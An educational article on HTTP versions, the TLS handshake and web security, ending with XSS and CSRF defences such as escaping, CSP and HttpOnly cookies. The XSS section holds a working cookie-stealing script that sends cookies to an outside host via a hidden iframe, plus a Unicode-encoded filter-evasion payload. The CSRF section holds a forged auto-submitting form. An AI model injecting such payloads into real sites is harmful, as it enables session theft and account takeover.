
HTTP & Network Security

This article summarizes some common computer networking concepts as a foundation for a deeper understanding of web development.

Network

HTTP Protocol

Introduction

HTTP is an application-layer protocol built on top of TCP/IP. It does not concern itself with how packets are transmitted; it mainly specifies the format of communication between the client and the server, and uses port 80 by default.

HTTP/1.0

Introduction

  • 1996 - Released

  • Version 1.0 introduced the POST and HEAD commands in addition to the GET command, which was the only one available in version 0.9.

  • The request and response formats must include not only a data section but also header information, i.e. HTTP headers (which describe metadata).

Request format

Request command + multi-line headers

GET / HTTP/1.0                                                <- request command
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5)   <- header
Accept: */*                                                   <- header

Response format

Header + blank line + data. First line is protocol version + status code + status description

HTTP/1.0 200 OK                                  <- first line
Content-Type: text/plain                         <- headers start here
Content-Length: 137582
Expires: Thu, 05 Dec 1997 16:00:00 GMT
Last-Modified: Wed, 5 August 1996 15:55:28 GMT
Server: Apache 0.84
                                                 <- blank line
<html>                                           <- data starts here
<body>Hello World</body>
</html>

Content-Type field

The headers are ASCII, but the data can be in any format. Therefore Content-Type is needed to tell the client the format of this data.

Common Content-Type field values are as follows.

text/plain
text/html
text/css
image/jpeg
image/png
image/svg+xml
audio/mp4
video/mp4
application/javascript
application/pdf
application/zip
application/atom+xml

These data types are collectively known as MIME types and follow the format: primary type/subtype.

Content-Encoding field

Since the data sent can be in any format, it can be compressed before it is sent. The Content-Encoding field tells the client how the data was compressed. Common compression methods:

Content-Encoding: gzip
Content-Encoding: compress
Content-Encoding: deflate

When making a request, the client can also specify which compression methods it accepts, using the Accept-Encoding field, as follows:

Accept-Encoding: gzip, deflate

Disadvantages

The main problem with HTTP/1.0 is that only one request can be sent per TCP connection: once the data has been sent, the connection is closed, and requesting another resource requires a new TCP connection. Establishing a TCP connection requires a three-way handshake between client and server and starts slowly because of TCP slow start, so creating new connections is costly.

To solve this problem, some browsers used the non-standard Connection field.

Connection: keep-alive

The above field requires the server not to close the TCP connection so that other requests can reuse it, and that reusable TCP connection will not be disconnected until either the client or the server actively closes it. However, this method is not standard.

HTTP/1.1

Released in 1997, HTTP/1.1 was used well into the 2010s and remained the most widely deployed version until HTTP/2 took hold.

Persistent connections

  • The biggest change in version 1.1 was the introduction of persistent connection, i.e. TCP connections are not closed by default, can be reused by multiple requests and do not need to declare Connection:keep-alive.
  • A connection is actively closed when there has been no communication between the client and the server for a period of time. However, the normative practice is for the client to send Connection: close on the last request, explicitly asking the server to close the TCP connection.

Note: For the same domain name, most browsers allow at most 6 persistent connections at the same time.
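
For illustration, here is a minimal Node.js sketch of connection reuse (assumptions for this article: Node's built-in http module and a placeholder host example.com). The keep-alive agent keeps sockets open between requests and caps the number of sockets per host, mirroring the browser limit mentioned above.

const http = require('http');

// Keep-alive agent: sockets stay open after a response and are reused,
// capped at 6 concurrent sockets per host (mirroring typical browser limits).
const agent = new http.Agent({ keepAlive: true, maxSockets: 6 });

function get(path) {
  return new Promise((resolve, reject) => {
    http.get({ host: 'example.com', path, agent }, (res) => {
      res.resume();                                   // drain the body
      res.on('end', () => resolve(res.statusCode));
    }).on('error', reject);
  });
}

// The second request can reuse the TCP connection opened by the first one.
get('/a')
  .then(() => get('/b'))
  .then(() => agent.destroy());                       // close idle sockets when done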

Pipeline mechanism

In version 1.0, within the same TCP connection, if a client wanted to request two resources, it would send request A first, wait for the server to respond, and only then send request B.

In version 1.1 the pipelining mechanism was introduced, which allows the browser to send both an A request and a B request, but the server still responds to the A request first, in order, and then to the B request when it is done.

Thus, the pipelining mechanism allows clients to send multiple requests at the same time over the same TCP connection.

Content-Length field

Declares the length (in bytes) of the data in this response, so the receiver knows where the body ends.

Chunked transfer encoding

In short, it means that the server sends a piece of data as it is generated, i.e. it uses the stream mode instead of the buffer mode.

Version 1.1 can therefore use chunked transfer encoding instead of the Content-Length field: whenever a request or response carries a Transfer-Encoding: chunked header, its body consists of an undetermined number of chunks of data.

Note: Each non-empty chunk is preceded by a hexadecimal value giving the length of that chunk. A chunk of size 0 marks the end, indicating that all the data for this response has been sent. Example:

HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked

25
This is the data in the first chunk

1C
and this is the second one

3
con

8
sequence

0
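
As a rough sketch of how this behaves in practice (an assumption here: Node.js and its built-in http module, with a placeholder port), the server below writes its response piece by piece without setting Content-Length, and Node then sends it with Transfer-Encoding: chunked automatically.

const http = require('http');

http.createServer((req, res) => {
  // No Content-Length is set, so the response falls back to Transfer-Encoding: chunked.
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.write('This is the data in the first chunk\r\n'); // sent as soon as it is ready
  setTimeout(() => {
    res.write('and this is the second one\r\n');
    res.end();                                          // terminates the body with the 0-length chunk
  }, 1000);
}).listen(8080);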

Other features

  • Version 1.1 also added many new verbs, such as PUT, PATCH, OPTIONS and DELETE.
  • A new Host field was added to the client request headers to specify the server’s domain name. With the Host field it became possible to send requests to different websites hosted on the same server, laying the groundwork for the rise of virtual hosting.

Disadvantages

HTTP/1.1 suffers from head-of-line blocking. Although a TCP connection can be reused, data communication within the same connection is still sequential: the server can only respond to the next request after it has finished responding to the previous one. If the response to an earlier request is slow, many requests queue up behind it.

Ways to mitigate head-of-line blocking:

  1. Reduce the number of requests, for example by merging scripts and stylesheets or embedding images directly in CSS code.
  2. Open multiple persistent connections at the same time, for example via domain sharding, where the required downloads come from several domains to work around the per-domain connection limit.

HTTP/2

Binary protocol

HTTP/1.1 has a text (ASCII) header and a text or binary data body. HTTP/2, however, is a thoroughly binary protocol, where both the header and the data body are binary, and are collectively referred to as “frames”: header frames and data frames.

The advantage of the binary protocol is that additional frames can be defined.

Multiplexing

In HTTP/2, both the client and the server can send multiple requests and responses at the same time over the same TCP connection, without having to match them up in order, thus avoiding the head-of-line blocking problem.

For example, over one TCP connection the server receives both request A and request B. It starts responding to A, finds that processing A is very time-consuming, so it sends the part of A’s response that is already ready, then sends the response to B, and finally sends the remainder of A’s response. This two-way, real-time communication is what multiplexing means.
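
As a rough illustration (assumptions: Node's built-in http2 module and an HTTP/2-capable placeholder server at https://example.com), the sketch below opens a single connection and issues two requests on it concurrently.

const http2 = require('http2');

// One TCP (+ TLS) connection; both requests are in flight at the same time.
const session = http2.connect('https://example.com');

function fetch(path) {
  return new Promise((resolve, reject) => {
    const req = session.request({ ':path': path }); // each request gets its own stream
    let body = '';
    req.setEncoding('utf8');
    req.on('data', (chunk) => (body += chunk));
    req.on('end', () => resolve(body));
    req.on('error', reject);
  });
}

Promise.all([fetch('/a'), fetch('/b')])
  .then(() => session.close());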

Data streams

In HTTP/2, packets are sent out of order; consecutive packets inside the same connection may belong to different responses, so it is necessary to mark the packet to indicate which response it belongs to.

HTTP/2 refers to all packets of each request or response as a stream. Each stream is given a unique number. When a packet is sent, it must be marked with a stream ID that identifies which stream it belongs to. In addition, all stream IDs sent by the client are odd numbers and all stream IDs sent by the server are even numbers.

When the stream is sent halfway, both the client and the server can signal the stream to be cancelled. In HTTP/1.1, the only way to cancel a stream was to close the TCP connection. HTTP/2 can cancel a request while ensuring that the TCP connection is still open and can be reused for other requests.

The client can also specify the priority of the data stream, the higher the priority the sooner the server will respond to it.

Header compression

As many fields in the request headers are repeated in each request (e.g. Cookie, User Agent, etc.), this can result in a lot of wasted bandwidth. HTTP/2 optimises this by introducing header compression. On the one hand, headers are compressed using methods such as gzip before being sent; on the other hand, the client and server maintain a header table which is a mapping of fields and index numbers, after which only the index numbers are sent to improve speed.

Server Push

HTTP/2 allows the server to send resources to the client unsolicited without receiving a request.

For example, if a client requests a web page containing many static resources, the server will actively send these static resources to the client along with the web page, so that there is no need to wait for the client to receive the web page and parse the HTML to find static resources before requesting static resources.
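
A minimal sketch of server push with Node's built-in http2 module (the certificate file names and the pushed stylesheet are assumptions for illustration): when the HTML page is requested, the server pushes /style.css before the client has parsed the HTML and asked for it.

const http2 = require('http2');
const fs = require('fs');

const server = http2.createSecureServer({
  key: fs.readFileSync('server-key.pem'),   // assumed local key/certificate files
  cert: fs.readFileSync('server-cert.pem'),
});

server.on('stream', (stream, headers) => {
  if (headers[':path'] === '/') {
    // Push the stylesheet proactively, before the client discovers it in the HTML.
    stream.pushStream({ ':path': '/style.css' }, (err, pushStream) => {
      if (err) return;
      pushStream.respond({ ':status': 200, 'content-type': 'text/css' });
      pushStream.end('body { color: #333; }');
    });
    stream.respond({ ':status': 200, 'content-type': 'text/html' });
    stream.end('<html><head><link rel="stylesheet" href="/style.css"></head><body>Hello</body></html>');
  } else {
    stream.respond({ ':status': 404 });
    stream.end();
  }
});

server.listen(8443);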

HTTPS - Extra

The security of Internet communications is built on the SSL/TLS protocol.

Note: SSL stands for Secure Sockets Layer; TLS (Transport Layer Security) is its upgraded successor.

Reasons for using HTTPS & what it does

Comparison:

  • HTTP does not use SSL/TLS and is therefore unencrypted communication, all information is transmitted in clear text

    1. Eavesdropping risk: third parties can intercept communications and learn their content
    2. Tampering risk: third parties can intercept and modify the content of communications
    3. Impersonation risk: a third party can impersonate one of the parties and join the communication
  • Benefits of HTTPS based on SSL/TLS protocol

    1. All messages are transmitted encrypted, so they cannot be eavesdropped on
    2. A checksum mechanism lets both parties detect any tampering with the content of the communication
    3. Identity certificates prevent impersonation

The basic operation of the SSL/TLS protocol

The basic idea of the protocol is asymmetric encryption: the public key encrypts, the private key decrypts. That is, the client first asks the server for its public key, encrypts the message with that public key, and the server decrypts the received ciphertext with its own private key.

  1. How to ensure that the public key cannot be tampered with?

    Answer: Put the public key into the digital certificate, as long as the certificate is trusted, then the public key is trusted.

  2. Public-key encryption is computationally expensive; how can the time it takes be reduced?

    Answer: For each conversation (session), the client and the server generate a “session key”, which is used to encrypt the messages. Because the session key uses symmetric encryption, it is very fast; the server’s public key is used only to encrypt the session key itself, which greatly reduces the time spent on encryption.

So, the basic process of the SSL/TLS protocol is:

  1. the client requests and verifies the public key from the server (the handshake phase)
  2. both parties negotiate to generate a “session key”
  3. both parties use the “session key” for encrypted communication

Handshake phase

The handshake phase involves four communications and all communications during this phase are in plaintext.

Phase 1: The client sends a request

First, the client sends an encrypted communication request to the server. The request it sends is mainly about the following.

  1. the supported protocol version, e.g. TLS 1.0
  2. a random number generated by the client to be used later to generate a “conversation key”
  3. the encryption method supported, e.g. RSA public key encryption
  4. supported compression methods

Phase 2: Server Response

The server receives a request from the client and sends a response to the client. The response mainly includes the following.

  1. confirmation of the version of the encrypted communication protocol used. If the two sides do not support the same version, the server will close this encrypted communication
  2. a random number generated by the server to be used later to generate the “conversation key”
  3. confirmation of the encryption method used
  4. the server certificate

Phase 3: Client Response

When the client receives the response from the server, it first verifies the server’s digital certificate.

If (1) the certificate is not trustworthy, (2) the domain name in the certificate does not match the actual domain name, or (3) the certificate has expired, a warning is displayed to the visitor, who can choose whether or not to continue the communication.

If there is no problem with the certificate, the client will take the server’s public key from the certificate and send a response to the server with the following main contents.

  1. A random number generated by the client. The random number is encrypted with the public key to prevent eavesdropping.
  2. A notification of the change in encoding. Indicates that subsequent messages will be sent using the mutually agreed encryption method and key.
  3. A client “finished” notification, indicating the end of the client’s handshake phase. This item is also a hash of all the content sent so far and is used by the server for verification.

Note: The random number generated in this phase is the third random number to appear in the handshake phase, known as the “pre-master key”. With it, the client and the server each hold the same three random numbers, and each side uses a pre-agreed encryption method to generate the same “session key” for the session.

Phase 4: Final server response

Once the server has received the third random number, it calculates and generates the “session key” for the current session. A final response is then sent to the client. The main contents are as follows.

  1. A change-of-encoding notification, indicating that subsequent messages will be sent using the agreed encryption method and key.
  2. A server “finished” notification, indicating that the server’s handshake phase has ended. This item is also a hash of all the content sent so far and is used by the client for verification.

At this point, the entire handshake phase is complete. Next, the client and server communicate encrypted, which is exactly the same as the normal HTTP protocol, except that all sent content is encrypted using the “session key”.
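
To see the outcome of such a handshake, here is a small sketch using Node's built-in tls module (example.com is only a placeholder host): it connects, lets the handshake run, and prints the negotiated parameters.

const tls = require('tls');

// Connect to an HTTPS server and inspect what the handshake negotiated.
const socket = tls.connect({ host: 'example.com', port: 443, servername: 'example.com' }, () => {
  console.log('Protocol :', socket.getProtocol());                // e.g. 'TLSv1.3'
  console.log('Cipher   :', socket.getCipher().name);             // the negotiated symmetric cipher
  console.log('Subject  :', socket.getPeerCertificate().subject); // who the certificate identifies
  console.log('Verified :', socket.authorized);                   // did the certificate chain check out?
  socket.end();
});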

Web Security

XSS - Cross Site Scripting

Introduction

XSS (Cross-Site Scripting) is a type of attack that exploits security vulnerabilities in web applications, i.e. a form of code injection. Such attacks usually involve HTML together with a client-side scripting language (mainly JavaScript).

For example, posting a piece of malicious JavaScript code on a web forum is script injection; if that code can also make requests to an external server, the attack is called XSS.

Therefore, it can be understood as XSS (cross-site scripting) = script injection + the ability to request an external server.

Example

For example, suppose the following code is posted as content on a forum site.

<script>
while (true) {
  alert('keep popping up windows')
}
</script>

Assuming the forum site has no filtering or other defence mechanisms, any user visiting this thread will have this pop-up popping up all the time in the client interface.

This is script injection in its simplest form. Of course, this particular script does no real harm beyond being annoying. XSS is built on the same injection technique, but the injected script additionally contains cross-site functionality, i.e. requests to another server.

For example, in the forum site mentioned above, the following code is injected.

<script>
(function (window, document) {
  // Construct the URL that leaks the information
  var cookies = document.cookie;
  var xssURIBase = "http://192.168.123.123/myxss/";
  var xssURI = xssURIBase + window.encodeURI(cookies);
  // Create a hidden iframe to send the request
  var hideFrame = document.createElement("iframe");
  hideFrame.height = 0;
  hideFrame.width = 0;
  hideFrame.style.display = "none";
  hideFrame.src = xssURI;
  // Start
  document.body.appendChild(hideFrame);
})(window, document);
</script>

This code sends the cookie of any user who views the post to the server at http://192.168.123.123/myxss/. Whoever controls that server can then take the cookie, visit the forum website, log in to the user’s account, and perform further operations.

Therefore, the above code is XSS.

CSRF - Cross Site Request Forgery

Introduction

CSRF (Cross-Site Request Forgery) is an attack that tricks a user into performing unintended actions (such as changing their name, deleting posts, or sending email) on a web application in which they are currently logged in.

Attack Principle

Generally speaking, CSRF is often carried out on top of XSS: the injected script forges requests, causing the victim to perform actions they never intended to perform.

Note: CSRF can also be carried out without XSS.

Example

After the external server has successfully obtained the user’s cookie, it can use the cookie to forge a series of requests to the forum website, such as changing the user’s name, changing the user’s password, etc. At this point, the attack can be called a CSRF.
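
As the note above says, CSRF does not strictly require stealing the cookie: the browser attaches the victim's cookies to cross-site requests on its own. The sketch below shows what a hypothetical attacker page might run; the forum.example.com domain and its endpoint are made-up names for illustration only.

// Hypothetical attacker page: the victim's browser submits this form to the forum,
// automatically attaching the victim's session cookie to the cross-site request.
(function () {
  var form = document.createElement('form');
  form.method = 'POST';
  form.action = 'http://forum.example.com/account/change-email'; // assumed endpoint
  var field = document.createElement('input');
  field.type = 'hidden';
  field.name = 'email';
  field.value = 'attacker@evil.example';
  form.appendChild(field);
  document.body.appendChild(form);
  form.submit(); // no user interaction needed
})();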

Protection against XSS and CSRF ⭐️

Core idea: never trust any data from an external source!

Generally speaking, most CSRF is based on XSS, so it can be said that by defending against XSS, you are basically defending against CSRF as well.

For the prevention of XSS, there are two main methods as follows.

  1. Input filtering: thoroughly filter sensitive characters from external input (front end + back end)
  2. Output filtering: when content is displayed on the page, process it so that sensitive scripts cannot be executed (front end)

Theoretically, wherever there is input data, there is an XSS vulnerability. JavaScript scripts can be injected into the database in various forms (e.g. plaintext, encoded, etc.).

As mentioned above, JavaScript can be injected in a variety of forms; the two main ones are:

  1. Plaintext:

    <script>
    ... // malicious JS code
    </script>

    Input filtering must catch plaintext injections like this one.

  2. Encoded:

    \u0026\u006c\u0074\u003b\u0073\u0063\u0072\u0069\u0070\u0074\u0026\u0067\u0074\u003b\u0061\u006c\u0065\u0072\u0074\u0028\u0026\u0023\u0033\u0039\u003b\u6211\u662f\u0078\u0073\u0073\uff0c\u4f60\u6709\u9ebb\u70e6\u4e86\u0026\u0023\u0033\u0039\u003b\u0029\u0026\u006c\u0074\u003b\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u0026\u0067\u0074\u003b

    The above is Unicode escaping; it can slip past an htmlSpecialChars filter and be stored in the database, and when the message is later displayed, the HTML layer converts the Unicode escapes back into plaintext, i.e. a genuinely executable script.

    Since not only Unicode but other encodings can be injected as well (for similar reasons), we should fix the page’s character encoding to a single one (e.g. UTF-8) so that we only have to focus on one class of encoded injection; output escaping (sketched below) then handles whatever reaches the page.
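
As a minimal output-filtering sketch (the helper name escapeHTML is just an illustration), the characters that are special to HTML can be encoded before untrusted text is inserted into the page, so an injected <script> tag is rendered as harmless text instead of being executed.

// Encode the characters that are meaningful to HTML before displaying untrusted text.
function escapeHTML(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Usage: the injected script shows up as text on the page.
var comment = '<script>alert("xss")</script>';
document.getElementById('comment').innerHTML = escapeHTML(comment);
// Simpler still, when no markup is needed: let the DOM treat the value as plain text.
document.getElementById('comment').textContent = comment;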

Some other general prevention methods

  1. Add a Content-Security-Policy HTTP header to the HTML output

    What it does: prevents the page from loading third-party script files when it is attacked by XSS

  2. Add the HttpOnly attribute when setting cookies

    What it does: prevents cookie information from being stolen by scripts when the page is attacked by XSS

    Disadvantage: the website’s own JavaScript code can no longer read or manipulate those cookies

  3. Check the Referer header of requests when developing the API

    What it does: it can prevent CSRF attacks to a certain extent (a combined sketch of these three measures follows below)
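
A combined sketch of the three measures above, using Node's built-in http module (the header values, cookie name and allowed origin are illustrative assumptions, not a complete policy):

const http = require('http');

http.createServer((req, res) => {
  // 3. A coarse CSRF check: state-changing requests must come from our own pages.
  const referer = req.headers['referer'] || '';
  if (req.method === 'POST' && !referer.startsWith('https://www.example.com/')) {
    res.statusCode = 403;
    return res.end('Forbidden');
  }

  // 1. Content-Security-Policy: only allow resources and scripts from our own origin.
  res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");

  // 2. HttpOnly (plus Secure and SameSite): the session cookie is invisible to page scripts.
  res.setHeader('Set-Cookie', 'session=abc123; HttpOnly; Secure; SameSite=Strict');

  res.setHeader('Content-Type', 'text/html');
  res.end('<html><body>Hello</body></html>');
}).listen(3000);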